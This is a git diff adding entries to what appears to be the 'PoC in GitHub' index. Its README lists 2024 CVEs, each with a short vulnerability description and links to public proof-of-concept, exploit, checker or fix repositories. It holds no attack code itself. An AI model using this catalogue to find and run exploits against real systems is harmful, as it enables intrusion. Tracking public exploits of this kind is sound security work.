+ "html_url": "https:\/\/github.com\/CBaekhyunC\/cve-2024-65230",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-23T10:16:43Z",
+ "updated_at": "2024-01-23T10:16:43Z",
+ "pushed_at": "2024-01-23T10:16:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/README.md b/README.md
index f8fe569671..5851fa1a42 100644
--- a/README.md
+++ b/README.md
@@ -1,8 +1,9056 @@
# PoC in GitHub
## 2024
+### CVE-2024-0015 (2024-02-16)
+
+In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [UmVfX1BvaW50/CVE-2024-0015](https://github.com/UmVfX1BvaW50/CVE-2024-0015)
+
+### CVE-2024-0039 (2024-03-11)
+
+In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [41yn14/CVE-2024-0039-Exploit](https://github.com/41yn14/CVE-2024-0039-Exploit)
+
+### CVE-2024-0044 (2024-03-11)
+
+In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [scs-labrat/android_autorooter](https://github.com/scs-labrat/android_autorooter)
+- [pl4int3xt/cve_2024_0044](https://github.com/pl4int3xt/cve_2024_0044)
+
+### CVE-2024-0195 (2024-01-02)
+
+Es wurde eine Schwachstelle in spider-flow 0.4.3 gefunden. Sie wurde als kritisch eingestuft. Es betrifft die Funktion FunctionService.saveFunction der Datei src/main/java/org/spiderflow/controller/FunctionController.java. Durch Manipulieren mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [Cappricio-Securities/CVE-2024-0195](https://github.com/Cappricio-Securities/CVE-2024-0195)
+
+### CVE-2024-0197 (2024-02-27)
+
+A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.\n\n
+
+
+- [ewilded/CVE-2024-0197-POC](https://github.com/ewilded/CVE-2024-0197-POC)
+
+### CVE-2024-0204 (2024-01-22)
+
+Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
+
+
+- [horizon3ai/CVE-2024-0204](https://github.com/horizon3ai/CVE-2024-0204)
+- [cbeek-r7/CVE-2024-0204](https://github.com/cbeek-r7/CVE-2024-0204)
+- [m-cetin/CVE-2024-0204](https://github.com/m-cetin/CVE-2024-0204)
+- [adminlove520/CVE-2024-0204](https://github.com/adminlove520/CVE-2024-0204)
+
+### CVE-2024-0230 (2024-01-12)
+
+A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic.
+
+
+- [keldnorman/cve-2024-0230-blue](https://github.com/keldnorman/cve-2024-0230-blue)
+
+### CVE-2024-0235 (2024-01-16)
+
+The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog
+
+
+- [Cappricio-Securities/CVE-2024-0235](https://github.com/Cappricio-Securities/CVE-2024-0235)
+
+### CVE-2024-0305 (2024-01-08)
+
+Eine Schwachstelle wurde in Guangzhou Yingke Electronic Technology Ncast bis 2017 gefunden. Sie wurde als problematisch eingestuft. Dies betrifft einen unbekannten Teil der Datei /manage/IPSetup.php der Komponente Guest Login. Durch das Manipulieren mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [jidle123/cve-2024-0305exp](https://github.com/jidle123/cve-2024-0305exp)
+
+### CVE-2024-0352 (2024-01-09)
+
+In Likeshop bis 2.5.7.20210311 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die Funktion FileServer::userFormImage der Datei server/application/api/controller/File.php der Komponente HTTP POST Request Handler. Mit der Manipulation des Arguments file mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [Cappricio-Securities/CVE-2024-0352](https://github.com/Cappricio-Securities/CVE-2024-0352)
+
+### CVE-2024-0399 (2024-04-15)
+
+The WooCommerce Customers Manager WordPress plugin before 29.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.
+
+
+- [xbz0n/CVE-2024-0399](https://github.com/xbz0n/CVE-2024-0399)
+
+### CVE-2024-0566 (2024-02-12)
+
+The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
+
+
+- [xbz0n/CVE-2024-0566](https://github.com/xbz0n/CVE-2024-0566)
+
+### CVE-2024-0582 (2024-01-16)
+
+A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.
+
+
+- [ysanatomic/io_uring_LPE-CVE-2024-0582](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582)
+- [Forsaken0129/CVE-2024-0582](https://github.com/Forsaken0129/CVE-2024-0582)
+- [0ptyx/cve-2024-0582](https://github.com/0ptyx/cve-2024-0582)
+
+### CVE-2024-0679 (2024-01-20)
+
+The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.
+
+
+- [RandomRobbieBF/CVE-2024-0679](https://github.com/RandomRobbieBF/CVE-2024-0679)
+
+### CVE-2024-0684 (2024-02-06)
+
+A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.
+
+
+- [Valentin-Metz/writeup_split](https://github.com/Valentin-Metz/writeup_split)
+
+### CVE-2024-0710 (2024-05-02)
+
+The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context.
+
+
+- [karlemilnikka/CVE-2024-0710](https://github.com/karlemilnikka/CVE-2024-0710)
+
+### CVE-2024-0713
+- [kitodd/CVE-2024-0713](https://github.com/kitodd/CVE-2024-0713)
+
+### CVE-2024-0757 (2024-06-04)
+
+The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files
+
+
+- [hunThubSpace/CVE-2024-0757-Exploit](https://github.com/hunThubSpace/CVE-2024-0757-Exploit)
+
+### CVE-2024-0783 (2024-01-22)
+
+Eine kritische Schwachstelle wurde in Project Worlds Online Admission System 1.0 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei documents.php. Durch Manipulieren mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [keru6k/Online-Admission-System-RCE-PoC](https://github.com/keru6k/Online-Admission-System-RCE-PoC)
+
+### CVE-2024-0844 (2024-02-02)
+
+The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with "Form.php" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+
+
+- [0x9567b/CVE-2024-0844](https://github.com/0x9567b/CVE-2024-0844)
+
+### CVE-2024-0986 (2024-01-28)
+
+Eine Schwachstelle wurde in Issabel PBX 4.0.0 ausgemacht. Sie wurde als kritisch eingestuft. Es geht hierbei um eine nicht näher spezifizierte Funktion der Datei /index.php?menu=asterisk_cli der Komponente Asterisk-Cli. Durch Beeinflussen des Arguments Command mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated](https://github.com/gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated)
+
+### CVE-2024-1071 (2024-03-13)
+
+The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [gbrsh/CVE-2024-1071](https://github.com/gbrsh/CVE-2024-1071)
+- [Trackflaw/CVE-2024-1071-Docker](https://github.com/Trackflaw/CVE-2024-1071-Docker)
+- [Matrexdz/CVE-2024-1071](https://github.com/Matrexdz/CVE-2024-1071)
+- [Matrexdz/CVE-2024-1071-Docker](https://github.com/Matrexdz/CVE-2024-1071-Docker)
+
+### CVE-2024-1086 (2024-01-31)
+
+A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n
+
+
+- [Notselwyn/CVE-2024-1086](https://github.com/Notselwyn/CVE-2024-1086)
+- [Alicey0719/docker-POC_CVE-2024-1086](https://github.com/Alicey0719/docker-POC_CVE-2024-1086)
+- [CCIEVoice2009/CVE-2024-1086](https://github.com/CCIEVoice2009/CVE-2024-1086)
+- [kevcooper/CVE-2024-1086-checker](https://github.com/kevcooper/CVE-2024-1086-checker)
+- [feely666/CVE-2024-1086](https://github.com/feely666/CVE-2024-1086)
+
+### CVE-2024-1208 (2024-02-05)
+
+The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
+
+
+- [karlemilnikka/CVE-2024-1208-and-CVE-2024-1210](https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210)
+- [Cappricio-Securities/CVE-2024-1208](https://github.com/Cappricio-Securities/CVE-2024-1208)
+
+### CVE-2024-1209 (2024-02-05)
+
+The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
+
+
+- [karlemilnikka/CVE-2024-1209](https://github.com/karlemilnikka/CVE-2024-1209)
+
+### CVE-2024-1212 (2024-02-21)
+
+Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n\n\n
+
+
+- [Chocapikk/CVE-2024-1212](https://github.com/Chocapikk/CVE-2024-1212)
+
+### CVE-2024-1269 (2024-02-07)
+
+In SourceCodester Product Management System 1.0 wurde eine problematische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei /supplier.php. Dank Manipulation des Arguments supplier_name/supplier_contact mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [sajaljat/CVE-2024-1269](https://github.com/sajaljat/CVE-2024-1269)
+
+### CVE-2024-1301 (2024-03-12)
+
+SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database.
+
+
+- [guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection](https://github.com/guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection)
+
+### CVE-2024-1302 (2024-03-12)
+
+Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file obtaining all sensitive information such as database credentials.
+
+
+- [guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure](https://github.com/guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure)
+
+### CVE-2024-1303 (2024-03-12)
+
+Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows an authenticated attacker to retrieve any file from the device using the download-file functionality.
+
+
+- [guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal](https://github.com/guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal)
+
+### CVE-2024-1304 (2024-03-12)
+
+Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted javascript payload to an authenticated user and partially hijack their browser session.
+
+
+- [guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS](https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS)
+
+### CVE-2024-1346 (2024-02-19)
+
+Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.
+
+
+- [PeterGabaldon/CVE-2024-1346](https://github.com/PeterGabaldon/CVE-2024-1346)
+
+### CVE-2024-1403 (2024-02-27)
+
+In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified. The\nvulnerability is a bypass to authentication based on a failure to properly\nhandle username and password. Certain unexpected\ncontent passed into the credentials can lead to unauthorized access without proper\nauthentication. \n\n\n\n\n\n\n
+
+
+- [horizon3ai/CVE-2024-1403](https://github.com/horizon3ai/CVE-2024-1403)
+
+### CVE-2024-1441 (2024-03-11)
+
+An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.
+
+
+- [almkuznetsov/CVE-2024-1441](https://github.com/almkuznetsov/CVE-2024-1441)
+
+### CVE-2024-1512 (2024-02-17)
+
+The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [rat-c/CVE-2024-1512](https://github.com/rat-c/CVE-2024-1512)
+
+### CVE-2024-1561 (2024-04-16)
+
+An issue was discovered in gradio-app/gradio, where the `/component_server` endpoint improperly allows the invocation of any method on a `Component` class with attacker-controlled arguments. Specifically, by exploiting the `move_resource_to_block_cache()` method of the `Block` class, an attacker can copy any file on the filesystem to a temporary directory and subsequently retrieve it. This vulnerability enables unauthorized local file read access, posing a significant risk especially when the application is exposed to the internet via `launch(share=True)`, thereby allowing remote attackers to read files on the host machine. Furthermore, gradio apps hosted on `huggingface.co` are also affected, potentially leading to the exposure of sensitive information such as API keys and credentials stored in environment variables.
+
+
+- [DiabloHTB/CVE-2024-1561](https://github.com/DiabloHTB/CVE-2024-1561)
+- [DiabloHTB/Nuclei-Template-CVE-2024-1561](https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561)
+
+### CVE-2024-1651 (2024-02-19)
+
+Torrentpier version 2.4.1 allows executing arbitrary commands on the server.\n\nThis is possible because the application is vulnerable to insecure deserialization.\n\n\n\n\n
+
+
+- [sharpicx/CVE-2024-1651-PoC](https://github.com/sharpicx/CVE-2024-1651-PoC)
+- [hy011121/CVE-2024-1651-exploit-RCE](https://github.com/hy011121/CVE-2024-1651-exploit-RCE)
+- [Whiteh4tWolf/CVE-2024-1651-PoC](https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC)
+
+### CVE-2024-1655 (2024-04-15)
+
+Certain ASUS WiFi routers models has an OS Command Injection vulnerability, allowing an authenticated remote attacker to execute arbitrary system commands by sending a specially crafted request.
+
+
+- [lnversed/CVE-2024-1655](https://github.com/lnversed/CVE-2024-1655)
+
+### CVE-2024-1698 (2024-02-27)
+
+The NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [kamranhasan/CVE-2024-1698-Exploit](https://github.com/kamranhasan/CVE-2024-1698-Exploit)
+
+### CVE-2024-1709 (2024-02-21)
+
+ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel\n\n vulnerability, which may allow an attacker direct access to confidential information or \n\ncritical systems.\n\n
+
+
+- [W01fh4cker/ScreenConnect-AuthBypass-RCE](https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE)
+- [HussainFathy/CVE-2024-1709](https://github.com/HussainFathy/CVE-2024-1709)
+- [sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass](https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass)
+- [cjybao/CVE-2024-1709-and-CVE-2024-1708](https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708)
+
+### CVE-2024-1781 (2024-02-23)
+
+Eine Schwachstelle wurde in Totolink X6000R AX3000 9.4.0cu.852_20230719 ausgemacht. Sie wurde als kritisch eingestuft. Betroffen davon ist die Funktion setWizardCfg der Datei /cgi-bin/cstecgi.cgi der Komponente shttpd. Dank der Manipulation mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [Icycu123/CVE-2024-1781](https://github.com/Icycu123/CVE-2024-1781)
+
+### CVE-2024-1874 (2024-04-29)
+
+In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell. \n\n
+
+
+- [ox1111/-CVE-2024-1874-](https://github.com/ox1111/-CVE-2024-1874-)
+
+### CVE-2024-2054 (2024-03-05)
+
+The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
+
+
+- [Madan301/CVE-2024-2054](https://github.com/Madan301/CVE-2024-2054)
+
+### CVE-2024-2074 (2024-03-01)
+
+Eine kritische Schwachstelle wurde in Mini-Tmall bis 20231017 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei ?r=tmall/admin/user/1/1. Mit der Manipulation des Arguments orderBy mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [yuziiiiiiiiii/CVE-2024-2074](https://github.com/yuziiiiiiiiii/CVE-2024-2074)
+
+### CVE-2024-2169 (2024-03-19)
+
+Implementations of UDP application protocol are vulnerable to network loops. An unauthenticated attacker can use maliciously-crafted packets against a vulnerable implementation that can lead to Denial of Service (DOS) and/or abuse of resources.
+
+
+- [douglasbuzatto/G3-Loop-DoS](https://github.com/douglasbuzatto/G3-Loop-DoS)
+
+### CVE-2024-2193 (2024-03-15)
+
+A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths.
+
+
+- [uthrasri/CVE-2024-2193](https://github.com/uthrasri/CVE-2024-2193)
+
+### CVE-2024-2257 (2024-05-10)
+
+This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to improper implementation of password policies. An attacker with physical access could exploit this by creating password that do not adhere to the defined security standards/policy on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to expose the router to potential security threats.
+
+
+- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257)
+
+### CVE-2024-2389 (2024-04-02)
+
+In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n\n
+
+
+- [adhikara13/CVE-2024-2389](https://github.com/adhikara13/CVE-2024-2389)
+
+### CVE-2024-2432 (2024-03-13)
+
+A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.
+
+
+- [Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP](https://github.com/Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP)
+
+### CVE-2024-2667 (2024-05-02)
+
+The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
+
+
+- [Puvipavan/CVE-2024-2667](https://github.com/Puvipavan/CVE-2024-2667)
+
+### CVE-2024-2876 (2024-05-02)
+
+The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [c0d3zilla/CVE-2024-2876](https://github.com/c0d3zilla/CVE-2024-2876)
+
+### CVE-2024-2879 (2024-04-03)
+
+The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [herculeszxc/CVE-2024-2879](https://github.com/herculeszxc/CVE-2024-2879)
+
+### CVE-2024-2961 (2024-04-17)
+
+The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.\n
+
+
+- [mattaperkins/FIX-CVE-2024-2961](https://github.com/mattaperkins/FIX-CVE-2024-2961)
+- [rvizx/CVE-2024-2961](https://github.com/rvizx/CVE-2024-2961)
+- [ambionics/cnext-exploits](https://github.com/ambionics/cnext-exploits)
+- [absolutedesignltd/iconvfix](https://github.com/absolutedesignltd/iconvfix)
+- [exfil0/test_iconv](https://github.com/exfil0/test_iconv)
+- [tnishiox/cve-2024-2961](https://github.com/tnishiox/cve-2024-2961)
+- [kjdfklha/CVE-2024-2961_poc](https://github.com/kjdfklha/CVE-2024-2961_poc)
+
+### CVE-2024-3094 (2024-03-29)
+
+Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. \r\nThrough a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.
+
+
+- [byinarie/CVE-2024-3094-info](https://github.com/byinarie/CVE-2024-3094-info)
+- [FabioBaroni/CVE-2024-3094-checker](https://github.com/FabioBaroni/CVE-2024-3094-checker)
+- [lypd0/CVE-2024-3094-Vulnerabity-Checker](https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker)
+- [OpensourceICTSolutions/xz_utils-CVE-2024-3094](https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094)
+- [bioless/xz_cve-2024-3094_detection](https://github.com/bioless/xz_cve-2024-3094_detection)
+- [Hacker-Hermanos/CVE-2024-3094_xz_check](https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check)
+- [Fractal-Tess/CVE-2024-3094](https://github.com/Fractal-Tess/CVE-2024-3094)
+- [wgetnz/CVE-2024-3094-check](https://github.com/wgetnz/CVE-2024-3094-check)
+- [emirkmo/xz-backdoor-github](https://github.com/emirkmo/xz-backdoor-github)
+- [ashwani95/CVE-2024-3094](https://github.com/ashwani95/CVE-2024-3094)
+- [harekrishnarai/xz-utils-vuln-checker](https://github.com/harekrishnarai/xz-utils-vuln-checker)
+- [teyhouse/CVE-2024-3094](https://github.com/teyhouse/CVE-2024-3094)
+- [alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer](https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer)
+- [Horizon-Software-Development/CVE-2024-3094](https://github.com/Horizon-Software-Development/CVE-2024-3094)
+- [hazemkya/CVE-2024-3094-checker](https://github.com/hazemkya/CVE-2024-3094-checker)
+- [lockness-Ko/xz-vulnerable-honeypot](https://github.com/lockness-Ko/xz-vulnerable-honeypot)
+- [brinhosa/CVE-2024-3094-One-Liner](https://github.com/brinhosa/CVE-2024-3094-One-Liner)
+- [isuruwa/CVE-2024-3094](https://github.com/isuruwa/CVE-2024-3094)
+- [k4t3pr0/Check-CVE-2024-3094](https://github.com/k4t3pr0/Check-CVE-2024-3094)
+- [Yuma-Tsushima07/CVE-2024-3094](https://github.com/Yuma-Tsushima07/CVE-2024-3094)
+- [jfrog/cve-2024-3094-tools](https://github.com/jfrog/cve-2024-3094-tools)
+- [krascovict/OSINT---CVE-2024-3094-](https://github.com/krascovict/OSINT---CVE-2024-3094-)
+- [Simplifi-ED/CVE-2024-3094-patcher](https://github.com/Simplifi-ED/CVE-2024-3094-patcher)
+- [gayatriracha/CVE-2024-3094-Nmap-NSE-script](https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script)
+- [Mustafa1986/CVE-2024-3094](https://github.com/Mustafa1986/CVE-2024-3094)
+- [MrBUGLF/XZ-Utils_CVE-2024-3094](https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094)
+- [galacticquest/cve-2024-3094-detect](https://github.com/galacticquest/cve-2024-3094-detect)
+- [zgimszhd61/cve-2024-3094-detect-tool](https://github.com/zgimszhd61/cve-2024-3094-detect-tool)
+- [mightysai1997/CVE-2024-3094-info](https://github.com/mightysai1997/CVE-2024-3094-info)
+- [mightysai1997/CVE-2024-3094](https://github.com/mightysai1997/CVE-2024-3094)
+- [mesutgungor/xz-backdoor-vulnerability](https://github.com/mesutgungor/xz-backdoor-vulnerability)
+- [reuteras/CVE-2024-3094](https://github.com/reuteras/CVE-2024-3094)
+- [amlweems/xzbot](https://github.com/amlweems/xzbot)
+- [gustavorobertux/CVE-2024-3094](https://github.com/gustavorobertux/CVE-2024-3094)
+- [ackemed/detectar_cve-2024-3094](https://github.com/ackemed/detectar_cve-2024-3094)
+- [0xlane/xz-cve-2024-3094](https://github.com/0xlane/xz-cve-2024-3094)
+- [dah4k/CVE-2024-3094](https://github.com/dah4k/CVE-2024-3094)
+- [hackingetico21/revisaxzutils](https://github.com/hackingetico21/revisaxzutils)
+- [devjanger/CVE-2024-3094-XZ-Backdoor-Detector](https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector)
+- [ScrimForever/CVE-2024-3094](https://github.com/ScrimForever/CVE-2024-3094)
+- [pentestfunctions/CVE-2024-3094](https://github.com/pentestfunctions/CVE-2024-3094)
+- [r0binak/xzk8s](https://github.com/r0binak/xzk8s)
+- [przemoc/xz-backdoor-links](https://github.com/przemoc/xz-backdoor-links)
+- [CyberGuard-Foundation/CVE-2024-3094](https://github.com/CyberGuard-Foundation/CVE-2024-3094)
+- [Security-Phoenix-demo/CVE-2024-3094-fix-exploits](https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits)
+- [MagpieRYL/CVE-2024-3094-backdoor-env-container](https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container)
+- [Bella-Bc/xz-backdoor-CVE-2024-3094-Check](https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check)
+- [TheTorjanCaptain/CVE-2024-3094-Checker](https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker)
+- [iheb2b/CVE-2024-3094-Checker](https://github.com/iheb2b/CVE-2024-3094-Checker)
